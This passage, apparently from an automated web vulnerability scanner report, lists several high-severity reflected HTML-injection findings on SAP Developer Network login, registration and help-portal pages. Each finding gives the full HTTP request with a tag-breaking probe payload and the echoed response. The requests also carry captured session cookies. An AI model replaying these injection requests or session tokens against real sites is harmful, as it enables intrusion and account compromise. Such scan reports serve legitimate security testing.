__utmb=198376301; __utmc=198376301; __utma=198376301.1725460367.1321213479.1321213479.1321213479.1; __utmz=198376301.1321213485.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fforums.sdn.sap.com%2fmessage.jspa%3fmessageID%3d7893915; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1321215306394%3B%20pe%3Dno%2520value%7C1321215306399%3B%20c3%3Dno%2520value%7C1321215306402%3B%20s_nr%3D1321213506409-Returning%7C1323805506409%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813506413%3B%20s_visit%3D1%7C1321215306416%3B%20gpv_p47%3Dno%2520value%7C1321215306419%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D5%3B%20s_sq%3Dsapcommunity%252Csapglobal%253D%252526pid%25253Dscn%2525253Aglo%2525253Aforums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.sdn.sap.com/irj/sdn/logon%2525253Fredirect%2525253Dhttp%252525253A%252525252F%252525252Fforums.sdn.sap.com%252525253A80%252525252Fmessage.jspa%252525253F%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MUEtMTMzOUU3NUQzNTAtNDYzQUExNkZFRDA1NzhDNw==
Expires: 0
Content-Length: 25006
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 19:50:49 GMT
Connection: close
Set-Cookie: PortalAlias=sdn; Path=/
Set-Cookie: PortalAlias=sdn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="/irj/scn/logon?redirect=/irj/sdn/logon?redirect=http%3A%2F%2Fforums.sdn.sap.com%3A80%2Fmessage.jspa%3FmessageID%3D7893915&1ccbf"><a>83f1a41f0f2=1">
...[SNIP]...

1.155. http://www.sdn.sap.com/irj/sdn/logon [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sdn.sap.com
Path:   /irj/sdn/logon

Issue detail

The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b262c"><a>ecdfa6545a5 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/sdn/logon?redirect=http%3A%2F%2Fforums.sdn.sap.com%3A80%2Fmessage.jspa%3FmessageID%3D7893915b262c"><a>ecdfa6545a5 HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://forums.sdn.sap.com/message.jspa?messageID=7893915
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MUEtMTMzOUU3NUFDNzItODJGQzEyQjNERTlEMTVGNA==; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; saplb_*=(J2EE3417100)3417150; JSESSIONID=(J2EE3417100)ID0344110250DB00531600921827091440End; SDNSTATE=442765484.14340.0000; mbox=check#true#1321213539|session#1321213478215-608827#1321215339; PortalAlias=scn; __utmb=198376301; __utmc=198376301; __utma=198376301.1725460367.1321213479.1321213479.1321213479.1; __utmz=198376301.1321213485.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fforums.sdn.sap.com%2fmessage.jspa%3fmessageID%3d7893915; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1321215306394%3B%20pe%3Dno%2520value%7C1321215306399%3B%20c3%3Dno%2520value%7C1321215306402%3B%20s_nr%3D1321213506409-Returning%7C1323805506409%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813506413%3B%20s_visit%3D1%7C1321215306416%3B%20gpv_p47%3Dno%2520value%7C1321215306419%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D5%3B%20s_sq%3Dsapcommunity%252Csapglobal%253D%252526pid%25253Dscn%2525253Aglo%2525253Aforums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.sdn.sap.com/irj/sdn/logon%2525253Fredirect%2525253Dhttp%252525253A%252525252F%252525252Fforums.sdn.sap.com%252525253A80%252525252Fmessage.jspa%252525253F%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MUEtMTMzOUU3NUQzNTAtNDYzQUExNkZFRDA1NzhDNw==
Expires: 0
Content-Length: 21882
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 19:49:38 GMT
Connection: close
Set-Cookie: PortalAlias=sdn; Path=/
Set-Cookie: PortalAlias=sdn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="/irj/scn/logon?redirect=/irj/sdn/logon?redirect=http%3A%2F%2Fforums.sdn.sap.com%3A80%2Fmessage.jspa%3FmessageID%3D7893915b262c"><a>ecdfa6545a5">
...[SNIP]...

1.156. https://www.sdn.sap.com/irj/scn/register [displayName parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.sdn.sap.com
Path:   /irj/scn/register

Issue detail

The value of the displayName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1cb6"><a%20b%3dc>988efa6ea6 was submitted in the displayName parameter. This input was echoed as d1cb6"><a b=c>988efa6ea6 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /irj/scn/register?redirect=&redirect= HTTP/1.1
Host: www.sdn.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.sdn.sap.com/irj/scn/register?redirect=&redirect=
Cookie: VisitID=QUMxMDY0MUUtMTMzOUYzNEExN0YtN0UyMzYyQzhFMzFGMDk1Nw==; saplb_*=(J2EE3417500)3417550; Unique=QUMxMDY0MUUtMTMzOUYzNEExN0UtMUVFRjVDODZCMzlBNDg2MA==; PortalAlias=scn; JSESSIONID=(J2EE3417500)ID0470980050DB00562634514529980956End; SDNSTATE=509874348.14340.0000
Content-Type: application/x-www-form-urlencoded
Content-Length: 345

oid=6&displayName=xssd1cb6"><a%20b%3dc>988efa6ea6&firstName=xss&lastName=xss&email=xss%40sap.com&password=XSS123XSS1_&confirmpassword=XSS123XSS1_&suserid=&suserpw=&emplUid=&emplFirstName=&emplLastName=&emplPassword=&emplConfirmpassword=&policies=on&
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUUtMTMzOUYzNEExN0UtMUVFRjVDODZCMzlBNDg2MA==
SDN_VISIT: QUMxMDY0MUUtMTMzOUYzNTAyNDAtRjI3M0E1MTZGRDYyNTRDQQ==
Cache-Control: no-cache
Expires: 0
Content-Length: 82292
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 23:18:55 GMT
Connection: keep-alive
Set-Cookie: PortalAlias=scn; Path=/
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<input maxlength="64" type="text" name="displayName" id="displayName" onblur="validatePublicDisplayName(false)" class="" value="xssd1cb6"><a b=c>988efa6ea6"/>
...[SNIP]...

1.157. https://www.sdn.sap.com/irj/scn/register [email parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.sdn.sap.com
Path:   /irj/scn/register

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fb50"><a%20b%3dc>7975eb96168 was submitted in the email parameter. This input was echoed as 2fb50"><a b=c>7975eb96168 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /irj/scn/register?redirect=&redirect= HTTP/1.1
Host: www.sdn.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.sdn.sap.com/irj/scn/register?redirect=&redirect=
Cookie: VisitID=QUMxMDY0MUUtMTMzOUYzNEExN0YtN0UyMzYyQzhFMzFGMDk1Nw==; saplb_*=(J2EE3417500)3417550; Unique=QUMxMDY0MUUtMTMzOUYzNEExN0UtMUVFRjVDODZCMzlBNDg2MA==; PortalAlias=scn; JSESSIONID=(J2EE3417500)ID0470980050DB00562634514529980956End; SDNSTATE=509874348.14340.0000
Content-Type: application/x-www-form-urlencoded
Content-Length: 345

oid=6&displayName=xss&firstName=xss&lastName=xss&email=xss%40sap.com2fb50"><a%20b%3dc>7975eb96168&password=XSS123XSS1_&confirmpassword=XSS123XSS1_&suserid=&suserpw=&emplUid=&emplFirstName=&emplLastName=&emplPassword=&emplConfirmpassword=&policies=on&termsAndConditions=1&Policy=AC10641C-12EFB04E54
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUUtMTMzOUYzNEExN0UtMUVFRjVDODZCMzlBNDg2MA==
SDN_VISIT: QUMxMDY0MUUtMTMzOUYzNTAyNDAtRjI3M0E1MTZGRDYyNTRDQQ==
Cache-Control: no-cache
Expires: 0
Content-Length: 82105
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 23:19:43 GMT
Connection: keep-alive
Set-Cookie: PortalAlias=scn; Path=/
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<input maxlength="60" type="text" name="email" id="email" class="" onblur="validatePublicEmail(false)" value="xss@sap.com2fb50"><a b=c>7975eb96168"/>
...[SNIP]...

1.158. https://www.sdn.sap.com/irj/scn/register [firstName parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.sdn.sap.com
Path:   /irj/scn/register

Issue detail

The value of the firstName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc9fe"><a%20b%3dc>6d7a8b5e4ab was submitted in the firstName parameter. This input was echoed as cc9fe"><a b=c>6d7a8b5e4ab in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /irj/scn/register?redirect=&redirect= HTTP/1.1
Host: www.sdn.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.sdn.sap.com/irj/scn/register?redirect=&redirect=
Cookie: VisitID=QUMxMDY0MUUtMTMzOUYzNEExN0YtN0UyMzYyQzhFMzFGMDk1Nw==; saplb_*=(J2EE3417500)3417550; Unique=QUMxMDY0MUUtMTMzOUYzNEExN0UtMUVFRjVDODZCMzlBNDg2MA==; PortalAlias=scn; JSESSIONID=(J2EE3417500)ID0470980050DB00562634514529980956End; SDNSTATE=509874348.14340.0000
Content-Type: application/x-www-form-urlencoded
Content-Length: 345

oid=6&displayName=xss&firstName=xsscc9fe"><a%20b%3dc>6d7a8b5e4ab&lastName=xss&email=xss%40sap.com&password=XSS123XSS1_&confirmpassword=XSS123XSS1_&suserid=&suserpw=&emplUid=&emplFirstName=&emplLastName=&emplPassword=&emplConfirmpassword=&policies=on&termsAndCondit
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUUtMTMzOUYzNEExN0UtMUVFRjVDODZCMzlBNDg2MA==
SDN_VISIT: QUMxMDY0MUUtMTMzOUYzNTAyNDAtRjI3M0E1MTZGRDYyNTRDQQ==
Cache-Control: no-cache
Expires: 0
Content-Length: 82104
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 23:19:11 GMT
Connection: keep-alive
Set-Cookie: PortalAlias=scn; Path=/
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<input maxlength="32" type="text" name="firstName" id="firstName" class="" onblur="validatePublicFirstName(false)" value="xsscc9fe"><a b=c>6d7a8b5e4ab"/>
...[SNIP]...

1.159. https://www.sdn.sap.com/irj/scn/register [lastName parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.sdn.sap.com
Path:   /irj/scn/register

Issue detail

The value of the lastName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ebaf"><a%20b%3dc>6c62ba37275 was submitted in the lastName parameter. This input was echoed as 5ebaf"><a b=c>6c62ba37275 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /irj/scn/register?redirect=&redirect= HTTP/1.1
Host: www.sdn.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.sdn.sap.com/irj/scn/register?redirect=&redirect=
Cookie: VisitID=QUMxMDY0MUUtMTMzOUYzNEExN0YtN0UyMzYyQzhFMzFGMDk1Nw==; saplb_*=(J2EE3417500)3417550; Unique=QUMxMDY0MUUtMTMzOUYzNEExN0UtMUVFRjVDODZCMzlBNDg2MA==; PortalAlias=scn; JSESSIONID=(J2EE3417500)ID0470980050DB00562634514529980956End; SDNSTATE=509874348.14340.0000
Content-Type: application/x-www-form-urlencoded
Content-Length: 345

oid=6&displayName=xss&firstName=xss&lastName=xss5ebaf"><a%20b%3dc>6c62ba37275&email=xss%40sap.com&password=XSS123XSS1_&confirmpassword=XSS123XSS1_&suserid=&suserpw=&emplUid=&emplFirstName=&emplLastName=&emplPassword=&emplConfirmpassword=&policies=on&termsAndConditions=1&Policy
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUUtMTMzOUYzNEExN0UtMUVFRjVDODZCMzlBNDg2MA==
SDN_VISIT: QUMxMDY0MUUtMTMzOUYzNTAyNDAtRjI3M0E1MTZGRDYyNTRDQQ==
Cache-Control: no-cache
Expires: 0
Content-Length: 82104
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 23:19:28 GMT
Connection: keep-alive
Set-Cookie: PortalAlias=scn; Path=/
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<input maxlength="64" type="text" name="lastName" id="lastName" class="" onblur="validatePublicLastName(false)" value="xss5ebaf"><a b=c>6c62ba37275"/>
...[SNIP]...

1.160. http://www400.sdn.sap.com/irj/boc [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www400.sdn.sap.com
Path:   /irj/boc

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 210cd"><a>bc448a96f9b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/boc?210cd"><a>bc448a96f9b=1 HTTP/1.1
Host: www400.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www400.sdn.sap.com/irj/scn/help-portal
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; __utmb=198376301; __utmc=198376301; __utma=198376301.1725460367.1321213479.1321213479.1321213479.1; __utmz=198376301.1321213485.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); saplb_*=(J2EE1712400)1712450; JSESSIONID=(J2EE1712400)ID1148016850DB00541318121912174719End; SDNSTATE=811864236.14340.0000; shpuvid=172.16.92.241.1321213592635805; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww400.sdn.sap.com%2firj%2fscn%2fhelp-portal; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; mbox=check#true#1321213694|session#1321213478215-608827#1321215494; PortalAlias=sdn; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Ahelp-portal%7C1321215467421%3B%20pe%3Dno%2520value%7C1321215467432%3B%20c3%3Dno%2520value%7C1321215467441%3B%20s_nr%3D1321213667454-Returning%7C1323805667454%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813667457%3B%20s_visit%3D1%7C1321215467460%3B%20gpv_p47%3Dno%2520value%7C1321215467463%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D9%3B%20s_sq%3Dsapsuite5%253D%252526pid%25253Dscn%2525253Aglo%2525253Ascn%2525253Ahelp-portal%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www400.sdn.sap.com/irj/boc%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MzAtMTMzOUU3N0YyMEYtNDg5OUI5MTJEODNGNjMwRg==
Expires: 0
Content-Length: 62578
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 19:51:31 GMT
Connection: close
Set-Cookie: PortalAlias=boc; Path=/
Set-Cookie: PortalAlias=boc; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="/irj/scn/logon?redirect=/irj/boc?210cd"><a>bc448a96f9b=1">
...[SNIP]...

1.161. http://www400.sdn.sap.com/irj/scn/help-portal [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www400.sdn.sap.com
Path:   /irj/scn/help-portal

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 598d1"><a>cbc4ee84307 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/scn/help-portal?598d1"><a>cbc4ee84307=1 HTTP/1.1
Host: www400.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://search400.sap.com/ui/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; __utmb=198376301; __utmc=198376301; __utma=198376301.1725460367.1321213479.1321213479.1321213479.1; __utmz=198376301.1321213485.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); saplb_*=(J2EE1712400)1712450; JSESSIONID=(J2EE1712400)ID1148016850DB00541318121912174719End; SDNSTATE=811864236.14340.0000; PortalAlias=sdn; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fsdn%2flogon%3fredirect%3dhttp%3a%2f%2fforums.sdn.sap.com%3a80%2fthread.jspa%3fthreadID%3d2072047; mbox=check#true#1321213640|session#1321213478215-608827#1321215440; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Asdn%253Alogon%7C1321215381080%3B%20pe%3Dno%2520value%7C1321215381088%3B%20c3%3Dno%2520value%7C1321215381092%3B%20s_nr%3D1321213581234-Returning%7C1323805581234%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813581267%3B%20s_visit%3D1%7C1321215381342%3B%20gpv_p47%3Dno%2520value%7C1321215381354%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D8%3B%20s_sq%3D%3B; shpuvid=172.16.92.241.1321213592635805; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MzAtMTMzOUU3N0YyMEYtNDg5OUI5MTJEODNGNjMwRg==
Expires: 0
Content-Length: 32233
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 19:50:58 GMT
Connection: close
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
